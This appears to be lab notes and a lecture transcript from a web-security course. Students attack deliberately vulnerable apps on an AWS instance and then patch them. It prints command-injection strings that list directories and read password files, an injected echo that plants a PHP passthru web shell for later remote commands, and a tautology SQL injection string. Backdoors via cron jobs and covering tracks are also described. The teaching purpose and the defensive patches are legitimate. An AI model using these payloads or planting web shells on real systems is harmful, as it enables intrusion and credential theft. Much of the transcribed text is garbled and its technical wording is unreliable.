About this Course

Objective :

1. You will learn how to hack web apps with command injection vulnerabilities in a web site
of your AWS Linux instance.
2. You will learn how to search valuable information on a typical Linux systems with LAMP
services, and deposit and hide Trojans for future exploitation.
3. You will learn how to patch these web apps with input validation using regular
expression.
4. You will learn a security design pattern to avoid introducing injection vulnerabilities by
input validation and replacing generic system calls with specific function calls.
5. You will learn how to hack web apps with SQL injection vulnerabilities and retrieve user
profile information and passwords.
6. You will learn how to patch them with input validation and SQL parameter binding.
7. You will learn the hacking methodology, Nessus tool for scanning vulnerabilities, Kali
Linux for penetration testing, and Metasploit Framework for gaining access to vulnerable
Windows Systems, deploying keylogger, and perform Remote VNC server injection.
8. You will learn security in memory systems and virtual memory layout, and understand
buffer overflow attacks and their defenses.
9. You will learn how to clone a Kali instance with AWS P2 GPU support and perform
hashcat password cracking using dictionary attacks and known pattern mask attacks.

Ex 1:
How to hack web apps with command injection
vulnerabilities in a web site of your AWS Linux
instance

Command injections - A type of cyber attacks called injection where operating system
commands are injected by hackers as part of the inputs and executed by a program and
typically in a Web server.

The command injection occurs when the program does not perform proper input
validations. That's a very important technique. General kind of technique, also defense.

The input from the users are used directly or, very importantly, indirectly most of the time
as parameters to the layer system command functions.

For example, exec function code or system function code by the program to send
confirmation maybe e-mail or notification e-mail or create a directory to
host user submitted data in an upload kind of case.

The consequence of command injection vulnerability is that it allows attackers to run

arbitrary, any, any OS command on the victim machine. The victim machine can be
hijacked to attack others, to perform any operations the hacker desires. Local password,
credentials, such as credit card information. Could be stolen and searched easily once
you've a command injection vulnerability.

It's listed as the number one vulnerability or application security threat at OWASP's (Open
Web Application Security Project) site was listed as a Top 10 Vulnerabilities in 2012 still in
2017. OWASP is Open Web Applications Security Projects. It is a wonderful
organization. And at creating a thriving global community that drives the visibility and
evolution in safety and security of the world's server.

Demo of command injection attacks on a registration website

The URL of the website is
https://cs591x.csnet.uccs.edu/reg.php.
Know that from our site.
This is a server running behind the UCCS firewall.
Therefore you can not reach it, but the virtual machine you are going to clone on AWS will
have the same content and allow you to perform the command injection to the web
server, similar to what I'm going to describe.

So let us create a VM in AWS.

1. Open the aws management console
2. Create a new instance – click Launch instance
3. Select community AMI

4. Search for CS5910

5. Choose instance type – t2.micro
6. Click configure instance detail

7. Select subnet “1a”

8. Click add storage

9. Click add tags

10. Click config security group
By selecting myip, we get ip address , copy that

Change the source as custom and paste the ip address

 Likewise add rules, HTTP,HTTPs and paste the same IP address.

11. Click “review and launch”

12. Click “launch”
13. Click Create new key pair

14. Download key pair

15. Click launch instances

16. We could see the screen

17. Click view instances

18. We could see

19. Select the instance so that we can see the instance details

20. Copy the public IP address

21. Paste it in the browser
22. Go to puttygen

23. Click Puttygen

24. Select conversions

25. Click import key

26. Select the pem file , click open

27. Enter key passphrase

28. Click “save private key”

29. Give the key name and save

30. Click putty

31. Select session

32. Copy the public ip address in aws instance.

33. Paste it in putty

34. Select connection->Data

35. Type auto-login username as “ec2-user”

36. Select SSH in connection

37. Click “Auth”

38. Click browse

39. Chose the private key and click open

40. We could see

41. Select session

42. Type “ec2-user” in the saves sessions

43. Click save

44. Select “ec2-user” and click open
45. Click Accept

46. Enter the passphrase and press enter kry

47. Enter the command “sudo yum update”
48. Create a directory

49. Get into the directory

50. ls

51. download website content

wget http://ciast.uccs.edu/coursera/pub/csr591.tbz
52. unzip the folder
tar jxf csr591.tbz

53. ls
Once we unzip,
Once we copy the www folder to root directoy, we could access the front page
sudo cp -r www /var/
54. check the content of www folder
cd www
ls

We can access all the php and html pages (as all the html and php files are inside the folder
html which is inside the www folder) as unzipped the folder.

Ex:
http://13.126.44.109//CS526S2012midterm.html

http://13.126.44.109//CS526S2012midterm.php
http://13.126.44.109//info.php

http://13.126.44.109//phpinfo.php
http://13.126.44.109//regCorrect.php

http://13.126.44.109//register.php
Now I want to do a new registration with student
Name: kalai, student UFP
login: selvi, Confirm student UFP login:kalai, student SID without
dash:666777888,

Try to enter the details and click “Register”

Registration failed
Try to upload a file sh7.php in http://13.126.44.109//upload.php

Could not upload.

Check the access rights of the folders and files
ls -l

Try to
http://13.126.44.109//CS526S2012midterm.php
chow,chow,#a88,
scroll down and Answer all the questions then click “submit”
Chow can submit the form. Now check the submitted form or details whether stored in
CS526/CS5262012midterm directory
 The url of the response web page shows the web form input is processed by midterm.cgi, a
perl server side script in cgi-bin directory.

To set up upload report web app and AWS key retrieve web app, let execute the following
command to allow the credential files to be read by apache.
For that it is required to copy the folder www to root folder.

55. copy that to root folder

sudo cp –r www /var/
if error occurs
cd www
 ls
cd html
ls

cd
cd proj

type this command (do not copy)

sudo cp –r www /var/

Once the www folder copied into the root folder /var)
 Get into the html folder.

cd /var/www/html

ls

Now try to register

Check the access rights
ls -l
In the above we could observe that root user has rights for midterm, gsc, studentproj. But
we need to give rights to apache. So

change owner of 3 folders “midterm”, “gsc”, “studentproj” (change ownership recursively on

all files and directories to apache:apache)
sudo chown -R apache:apache midterm gsc studentproj

change mode – ( 7 means user has the read, write,execute permission, 5 means group has
read, execute permission, 5 means others have read, execute permission)
sudo chmod -R 755 midterm gsc studentproj
 ls -l

Now we could see the user name apache against midterm, gsc, studentproj

56. goto browser and paste : http:// 3.110.54.185 /CS526S2012midterm.php

note : 3.110.54.185 is the public ip address copied from aws instance

57. type chow, chow, #a88 and press enter

If we try to enter unregistered user login credentials we get msg “Login not correct”.
Ex: enter kalai, kalai, hai
Again go back
Enter chow, chow, #a88 then press enter
You will get the following response web page

The url of the response web page shows the web form input is processed by midterm.cgi, a
perl server side script in /var/www/cgi-bin directory.

Login to your instance to see if an answer file is created on

/var/www/html/midterm/CS526/CS5262012midterm directory
Yes it is created
 To set up upload report web app and AWS key retrieve web app,let execute the following
command to allow the credential files to be read by apache.

58. come to putty

to change the mode to get rights to all the txt files of folder “data”

type –

sudo chmod 755 /var/www/data/*.txt

to change the mode to get rights to all the csv files of folder “data”
59. Type
sudo chmod 755 /var/www/data/*.csv

60. Type - http:// 3.110.54.185/upload.php

in browser

(By using the url we are visiting the different pages for example upload page of the same
website)

61. Save a file with name “hai” as image file in desktop and select that file and click send file
As the login is correct it allows to upload a file. By using the url we are visiting different
pages of same website.
 The url of the response web page shows the web form input is processed by upload.php
script in /var/www/html directory.
Now let us explore the web page that allows a project group to retrieve their AWS Access
Key and Secret key based on the login/password credential. Type http:///keyaccess.html You
will see the follow web page. Hit “retrieve keys” button

62. Type - http://ip/keyaccess.html

The url of the response web page shows the web form is processed by vul.py a python script in
/var/www/cgi-bin directory.

From this we can say all three web apps midterm.php, upload.php, keyaccess.php are working

The /reg web page take in the full name are shown in the web page below.
Full name, email, password and then come the [INAUDIBLE] value of the membership
applicant.
When the user fills in this information and clicks on the register button the web form data
will be submitted to the web server for processing.
The data will be saved in the database and email will also be sent to the user's email.
And then they know that the registration is approved and the provided link they can
access to the member specific variable informations, variable webpage.
The system admin will then look at the application and then try to approve the
membership. This particular set up for this particular web browser, web app.

Here we show the hacker can actually attach a malicious unix command as showed as
ampersand sine os ampersand sine just four capture. Right after the typical email entry.
The register button is then clicked. So this particular demo you can actually tell your
friend the smallest character. Example of Command Injection is four characters.

COMMAND INJECTION ATTACKS:

63. Type the following

http://13.126.44.109//keyaccess.html

csnet&ls&
Click “retrieve keys”

If we examine the content of /var/www/cgi-bin on your instance. You will find the same list.
This is due to the fact that the command was executed by vul.py python server side script on
its directory.
&ls& shows the directory content of /var/www/cgi-bin

So we could get the directory content by using the malicious strong &ls&. To verify this we can get
into the cgi-bin directory in putty.

Treasure Hunt

1. &cat passwd&
 To view the content of the passwd file

Now we could see the password of all the users. Ex: jupchurc:#a38
Now I could login as jupchurc (after identifying the passwords) in the page http:// 3.110.54.185
/CS526S2012midterm.php
/var/www/html/ is the apache web document root directory it hosts a lot of directories. If we were
to leave behind some trajon files, we need a directory where the apache web server can perform
read and write.

1. If we want to know the access rights of all the users. We can use the OS command &ls –al
../html& in the webpage http://3.108.41.212//keyaccess.html
highlighted one of the directories, midterm, that Apache accounts can write to it

To list all the files with owner name

&ls -l&
&ls -al&
To view the content of vulpy.txt file

&cat vulpy.txt&
HACKING MIDTERM WEB APP:
Given that we know /var/www/html/midterm directory is writable with command injection and the
vul.py is executed in /var/www/cgi-bin/,
we come up with the following malicious string.
The echo > command allow us to write a single line php script (trajon file) as a file call sh6.php
../html/midterm is a file system navigation maneuver from /var/www/cgi-bin to
/var/www/html/midterm

Now enter the following malicious string to the login entry right after csnet inorder to add the file
sh6.php in the http://ip/midterm

& echo ‘<?php passthru($_GET[cmd]); ?>’> ../html/midterm/sh6.php &

http://3.108.41.212/CS526S2012midterm.php
After this is done, verify sh6.php is in midterm directory with https:///midterm/ to see if sh6.php is
there
http://3.108.41.212/midterm/
https:///midterm/ to see if sh6.php is there. Try https:///midterm/sh6.php?cmd=ls to see if it will
display the content of midterm directory.

Try https:///midterm/sh6.php?cmd=cat ../php/reg.php

Hacking Midterm Web App.

In putty
You must be in html folder. Otherwise again run the command
cd /var/www/html/
then
sudo vi /var/www/html/hackv2.php

enter “insert key”

Replace ‘<?php with ‘&lt?php
Also replace sh2b.php with sh6b.php

Press escape key, then :wq

sudo ls /var/www/html/gsc

Hacking Upload Web App. In your local machine, type “echo '' > sh7.php” to create sh7.php file.
Note that use single quote characters to wrap the one line php file. Try to type it, not copy and
paste, because the word process may use different characters.
http://3.108.41.212//upload.php

choose sh7.php

enter “send file”

Type http://<IP>/hackv2.php Visit any text input, hit Enter.

http://ip/keyaccess.html must be with the command & echo “> ../html/midterm/sh6.php &
Now enter the chow,chow,#a88 in http://3.108.41.212//hackv2.php
Create a file sh7.php with content echo '<?php passthru($_GET[cmd]);?>'>sh7.php
Choose the file sh7.php to upload
Note that the malicious file was accepted (surprise!) and saved in

http://13.127.137.113/gsc/master/jgray/doc/sh7.php?cmd=ls
--END--
Now let's see what the HTTP response coming back. We see a long list of the files, right in
the middle there. Staring with counters PHP action, dot PHP and so on.

And they are returned, followed by the original greeting and status messages.
It turns out, all this middle part is a file in the directory /var/www/html/php.
Which is exactly the same location of the server side script, that are processing the
request. It is located inside the web server location,
see in this case CS 591 x [email protected]. We also see the ampersand LS, ampersand sign is
included in the mail command which are echoed.
Normally you shouldn't print out your mail whatever the command in
your server size script, but here is for the demonstration purpose.
It turns out by adding this right after the AOS.n
We can display the content
in /var/html.
Basically, what we are saying is you can actually change the OS
command by other reprising commands as that would be executed.
And the IOS dot dot means go to the upper directory
of /1/wxtmlpsp which is this one.
Basically, we can now navigate through the file system
in the victim's web service site as long as we have the privilege.
And in our case, the server side script regit.php is run by the account Apache,
so long as Apache can read and execute the file
you can actually display and navigate through that.
The directories of Apache doesn't have the execute or read-write.
Then we will not get any result coming back.
We cannot display those with this attempt.
But still, any of the web directory, since Apache needs to be able to read it.
Therefore it will be able to display the content.
How about if you like to display the action.php? Well, very simple.
Just do a cat, space Action.php and prefix with ampersand sign and then post script with
ampersand sign. Submit it through the webpage. Now you are going to see the content of
that action.php. Normally the php service, we don't want to reveal its content only the
execution result html but you are going to see they are very variable in measures coming
back. I will let you try it and maybe discuss with your classmates. In this MOOC, what other
critical credential information was revealed inside the action.php? Here we show it by
replacing &ls& with &cat ../../cgi-bin/passwd&. Thus doing, when we enter and submit, we
were able to display the content of the password file right in the middle there. You can see
a typical password file format, the login name, followed by the colon which is a separator,
followed by the password string. In this case, unfortunately encrypt in using the parent
text pound sign something. Okay, so is very revealing using CAT, you can actually see the
content, and then capture a lot of information in the Web server side.
So we just demonstrate to you we can run any OS command in the victim site and
navigate up and down in the file system.

SQl Injection Attack

Discussion on

• SQL injection impact,

• SQL injection - source of this vulnerability
• how the password information in database can be revealed by
injection, logical expression in a secure expression statement, wire-input data,
and bypass override the condition checking in SQL commands.

SQL injection is a type of injection application vulnerability attack where SQL

commands or related logical expressions are injected by the hackers as part of the
input and executed by the SQL server.
It resulting in revealing the sensitive data, such as password, credit card numbers, in
the SQL database.
It occurs when the program does not perform the input validation we saw in
command injection case.
The input from the users are used directly or indirectly as a parameter to the later
SQL queries.
The SQL injection vulnerability will allow attacker to modify, execute SQL query on
the victim's actual server.
The hacker can steal and create fake password and credential information inside the
victim database. They can steal or forge other critical information inside the
database, like command injection.
In the same category of injection vulnerability, SQLinjection is one of the number 1
in OWASP Top 10 Vulnerabilities 2013. It remains number 1 in OWASP Top 10
Application Security Risks, which will probably be published August this 2017.

Unlike command injection, SQL injection focus on attacking the SQL server,
and therefore it cannot execute arbitrary OS command.
Personally I feel it's less dangerous, but then critical information could be revealed.
MySQL server, which is to be run on Linux, maintain its own password file in MySQL
database, by this specific database called MySQL, inside its user table, a table with
the name USER.

They are different from the password maintained by the operating system in
/etc/shadow, typically /etc/shadow in Linux system.
However, for convenience or for [LAUGH] laziness reason, if the system
administrator is too lazy, often the login and password are exactly the same created.
The hacker can then log in.
If they break into a database, retrieve this credential information, they can
then login through the victim's system. This is called escalating of the privilege.
You steal credentials from one area of the services, you can authorize in the other
service. Escalating privilege is one of the important hacking methodology steps.

Here is a demo of SQL injection attack using a typical Membership Profile Request
web app.
First, let us show the normal operation.
sudo yum update
Download the website http://ciast.uccs.edu/coursera/pub/csr591.tbz
wget http://ciast.uccs.edu/coursera/pub/csr591.tbz

Extract the files

tar jxf csr591.tbz
First verify if MySQL server is up and running,by using the command
 ps aux | grep mysqld
or

we can use the following command

nmap localhost

If mqsql is not running then run the following command

If mysqld is not running, then you can start it with
sudo service mysqld start
Then to verify run the following command

run nmap localhost

nmap localhost
Setup mysql database account and database tables for the web apps with
vulnerabilities.
First switch the directory to /var/www/data
cd /var/www/data
 Run the following commands to set up the related databases and tables
for the SQL Injection exercises.
sudo mysql/createacc.pl cs00net chow "#Uc2013lions$"
sudo mysql -u root -pcs00net chowdb < admin.sql
sudo mysql -u root -pcs00net chowdb < member1.sql
sudo mysql -u root -pcs00net chowdb < cs591.sql

http://3.110.86.19/showme.php
In the Membership Profile Request web app page, we enter the email address and
the passwords and then we click the Submit button.

If the password check are OK, the status is shown in the activity response web page
coming back.

Here we show SQL injection exploit, or vulnerability, of the Membership Profile

Request web app.

By just adding a malicious string, single quote, 'or 0=0 or' ,operator,
ending with a single quote.
Now enter ‘ or 0=0 or ‘ in Email and Submit it
If we enter this string right after the email address, we are able to retrieve the profile
information of all the member in this particular database, including the password for
access the website.

Know that missing the two single quote characters or the last or operator in this
malicious string, will not result in the display of those password information.
It's very tricky, but we will explain why is that later on.

The SQL query result will return SQL syntax error at line one, if we're missing those
single quotes or the or operator.

For example, by removing the last or operator, we will have 0= 0 single quote
end up in the SQL query closed statement, where 0 quote is not a legal term in SQL
statement.
Therefore, SQL query processing will reject and print out there's a syntax error.

Let's examine the showme.php code to understand where the vulnerability of the
SQL injection occurs.

First the code, we can spot looking at the pattern, it violates the security design
pattern as we discussed in the previous session. It does not check on the input right
after we read in the input data, as shown in the arrow there.
Furthermore, the input email is used in SQL query.
The query also use star, a wildcard character, to display all the fields in the table,
and that should be changed to make it more specific.
For example, instead of showing the password, we probably should result in a
special request before we show the password. Remember the paradigm to replacing
generic mechanism with specific mechanism, the more specific, the better the
security.
Here we examine how SQL query with malicious string are evaluated.
By turning on the print debugging statements in the showme.php,
we get the following query printout, which shows out we have 'or 0=0 or', called a
malicious string, injected into the SQL query, as shown in the middle there.

The where clause has three expression altogether. And we highlight the malicious
string with red colors. And turn out there are three expressions.
They are connected with or operator. The first operation, first expression,
email='[email protected]'. This is the normal expression, which we see in normal
query.
It would return true as intended, and therefore it only showed one of the row when
we examine all the row.
The second expression, 0=0, is the malicious attack, which as a logic expression will
return always true.
And because anything true or another value is true although, is always returned true,
we simply bypass a previous logic expression. And any of the row in the database
will then be matched and displayed.
The third one is a two single quote character. It doesn't matter in this case, since the
middle logic expression already override that particular way across, to yield the true
expiration for all or. This term, two single quotes, doesn't seem to matter.

Therefore, in this case, all that row information in the member1 table will come back
and display, and all the column will also display, because we use wildcard character
star.

Patching Web App with SQL Injection Vulnerability

• In this lesson we patch the membership profile retrievable web app which has
the SQL vulnerability with two techniques.
 • The first one is Input Validation technique, the other one is Parameterized
Query technique.

Remember the first rule in Security Design Pattern A, we present in previous lesson
for command injection defense. We observed three sub patterns.
1. The first one, always validate input before performing any program specific
operation after we read in the input.
2. Second, we validate the input data using regular expression so to detect the
malicious string.
3. Third, we exit right away once we detect the malicious string or code.

Here, we have two input validations.

• If statement right after we read-in email and password we validate the email
and password with regular expressions.
• The email regular expression pattern does not allow all the equal sign, a
space, and a single core character to pass through.
Because of email you shouldn't have any of those characters and therefore some
malicious string that we just discussed we all be detected by that regular expression
matching.
And the true branch will be executed.
The processing up to the print out statement print out the error message.
We'll then exit without further execution.
Here we show the validation result that show me defense pb.php is protected by the
effective input validations.
Even though the input validation can catch most if not all of the error, here we apply
defend in depth kind of principle by implementing the parameterized SQL query
so that we can restrict the query execution further.
Here is the idea.

We use a question mark symbol to represent each of the parameter in the query thus
we limit the number of variable input to the query.
Once the query is prepared the hacker can no longer add any additional expressions
or queries statement into the SQL query.
We then use the bind on a scope parameter function to bind the parameter.
We use very specific type use the string number and the actual variable. We can
double check whether the variable contains a value that is exactly the same time.
For example the numerical value we can restrict using I for double value we use the
symbol of D to represent in the first parameter of bind parameter.
S for string and B for blob object. The query processing will detect any for this type
matching with the value to be submitted.
We will use Show me defense pb.psp, which is a modification of showme.psp,
int_slash_y_slash_ww_html your chrome what was mention.
• Line 29 we see the $_email variable is replaced by a question mark in the
query statement we try to formulate.
• Line 34 we see bind_underscore_parameter to bind a string type to the
variable because $_email variable is a string type.
• Line 42 we bind_underscore_the result using this function to return for
variable corresponding to very specific columns which we write to return to form the
response web page.

Hacking methodology

1. Footprinting

• Hacker will start by surveying and gathering information about the

organization they intend to penetrate and hack into. This step is called
footprinting.

• The right column here show the command we use to obtain those related
information in the internet about the organizations.
• We have whois you can type in most of the nicknacks system and it will return
those critical organization information about administrator and the technical
contact information, how many server, name server, are serving that particular
domain.
• And we also see the netscraft as one of the command. Actually one of the website
that provide a query, allow you to type in a domain name, and it track all of the
Web servers they've used for that organization, over the years; including the
 operating system and the version. And we were able to find that information very
valuable.

2. Scanning

Here we use and Nmap command or one of the famous tool called nexus.
• Nmap - Network Mapper. It is an open-source Linux command-line tool that is used to
scan IP addresses and ports in a network and to detect installed applications.
Nmap allows network admins to find which devices are running on their network,
discover open ports and services, and detect vulnerabilities.
• It allows us to find out what other machines within that domain or subnet range,
network adjust range, how many machine are active, how many server are active
and what are the ports which represent the specific service that are open.
• The Nexus too can even instructed it to gather and analyze the operating system
and package and identify the vulnerability listed and even tried to launching the
malicious attack.
3. Enumerations
• It is a process of gathering the information about the target machine by actually
actively connect to it.
• hacker try to identify user, system, admin kind of accounts and try to find out what
the active directory, shared directory that may be open.
• And if there's a web server they will try find out what are the web page that is
available for potential injection attacks.
4. Wiretap
• We can wiretap the network or using the legitimate account to analyze the network
traffics and explore the web page to see if they have command or unsecure injection
vulnerability. This is so called low hanging fruit.
5. Escalating privilege
• With the privilege we established in number four, we then- a hacker will then
perform treasure hunting. We do that by exporting variable directory within the
attackers system.
Ex: the passport file, the script, server site script file, which may have embedded
with some credential information, maybe some configuration file. And try to
gather additional credential passport information and we search directory and
see whether they can read or write or even execute. And see whether we can even
modify the access right or its security token if they are using secure index more
for protection. In case the passport file is readable and the passport maybe
encrypted we can read it out and offline. We use password cracking tool such
as, johntheripper showing here to break into the additional account.
6. Pilferting
• Gathering the information on identify the Mackays to allow access to the trops
system. This including examining the configurations of various network
services. And often they include commands and showing how they are configured.
All they actually contains the credential credit card, passport information such as,
 server connection information or very typical for intrusion detection system. They
might including database account for access and deposit detecting malicious
information.
7. Covering the track
• System may including logs or intrusion detection system that monitor and knew
your access or modification of critical, file and directory. Such law breakers, the
hacker may attempt to modify, to hide their track if that is possible.
Note that from previous lesson some operating system will prevent this from
happening by only allow a pen right to the lock.
8. Backdoor
• to allow re-entry sometime in the future. The hacker may create scripts to be
excecute by the Cron job, or At job, in a regular interval. And when they are execute
it will examine the remote executable they have deposit and see whether they still
exists.
If they are wiped out by the anti-virus quarantine these At job and Cron job will put it
back. And therefore, that's a reason why, from time to time we see the quarantined virus
reappear. And these also show why a back door attack is very important.
A Trojan kind of attack is very important to detect. Make sure we search.
Once we got attack, make sure we search the start up folder, registry entry and those
At/Cron type and the configuration file to see we have those dangerous Script there.
And sometimes they will hide those file, those script with the DOT prefix widget.
That's called hidden directory or hidden file.
9. Denial of service
• Maybe after the weakened machine has been explored with all the treasure and no
longer useful. Sometime we launching the denial of service attack to shut down the
system. And that can also happen when we can't actually, we cannot
penetrate. And then we use this kind of proof for denial of service attack. And this
can be done from outside or from inside by modifying the configuration of network
routing table and confusing the system interior and resulting in incorrect routing or
database access. And in this case it's very important for the vendor to backup the
file and images. But at the same time the hacker will try to, if they can get access to
this backup up file and images, restore image, they will try to modify and resulting
in failed disaster recovery process. So pick up in multiple places that's important
steps.

Demystify New OS/PL Will Not Have Injection Vulnerabilities

we examine the common misconception in terms of vulnerability.
• Including the claims that systems with new operating systems will have fewer
vulnerability.
• same thing for the newer programming language, that we'll have less vulnerability.
• Will a vulnerability exist on a well patched machine running newest operating
system? The answer is yes.
• The command and SQL injection attack we have successfully demonstrated and
performed are on Linux machines with the most recent Fedora operating system
release, and also patched with the most recent patch. Both operating system, web
server, and MySQL database are patched with the most recent patch. We still see it
being attacked. And the reason is this vulnerability is not coming from the
operating system library or the server. It's coming from applications. And it's
coming from ill designed, not properly designed, not well implemented web
applications.
• And a major reason for that is the web programmer was not trained and educated
with secure software engineering techniques, and new, secure design patterns. The
operating system and network library, even though they have been patched, the
most recent release goes through the best practice for this Linux and those
network library distributions. And therefore they are typically going through very
rigorous testing and software scanning. And therefore we see much fewer
vulnerability in those operating systems, nor in their network library.
It is not the same case in the application domain. We hire high school kids, we hire
programmer that is not trained with secure coding techniques. And therefore, we
often have high variety of this kind of source of this program coming from different
 sources and provide application code. And then it makes the screening of this
vulnerability there very difficult.
• Will the vulnerability exist on a more modern programming language with type
safe feature, such as Python, maybe in the Swift that being proposed by iOS,
Apple? The answer is yes, they can still occur.
• Here is a example of a web app provide AWX access, a key and a security access
given a account and password. It's written in Python. Through a keyX@HTML web
page in your Chrome virtual machine, we can actually enter the login and
password and input there, submit it to this Python script in the cgi-bin directory.
The result will be the corresponding access key and the signal key return. This
script is written in newer Python programming language. But it contains exactly
the same kind of command injection vulnerability. we showed on using PHP script,
ig.php. It accepts exactly the same malicious string &ls&, just four character
there. And it will display the content of the working directory, which the server side
script reside, which is /y/w/cgi-bin.

What command we can use to display the password file in this directory?
The answer, is cat command, you just say cat. The password and it will show the actual
content of the password file in the cgi-bin directory.
Here we show the actual code of the Python server-side script and discuss its
vulnerabilities. Line 27 through 29 read in the input variable.
And we can spot right away, based on the security design pattern, there's no validation
code for that, right? We need to see some code with if statement and that has contained
regular expression, okay? We didn't find it there.
Line 59 show the formatting of mail command. And here the last variable, we have three
variables there, sharing a library by the ampersand sign.
The last variable is login. And if we look at the corresponding formatting string in the
front, it actually substitutes a -c parameter of the mail command, which is the carbon
copy parameter, which specifies the list of users who were send a copy of the email.
Line 59 shows the os.system function. And this is the way Python script allow you to
execute by providing OS command and has the same effect. It too was too generic.
And it should be asked, according to our security design pattern, any generic kind of
function call should be substituted with more specific function call meet the purpose.
In our case, we should use specific mail command. Since mail command variable contain
the variable or login from the initial user input, this vulnerability is very severe, and often
be classified as such in scanning tool.
Here we show how to patch this Python script.
Between lines 34 and 35, we insert
the regular expression matching functions.
And if the result is not matched, we print out the error message and
using sys.exit() function to exit right away.

Play video starting at :7:40 and follow transcript7:40

The input validation code is inserted
right after the input data, as you see right there.
And after we read a full name, login, and password,
we insert that input validation code.
Line 79 use the sendmail method of the imported
SMTP object from the SMTP library.

Play video starting at :8:9 and follow transcript8:09

It is specific function used to send email.
We are not using os.system generic system code.
Which, you shouldn't use that in your future programming practice.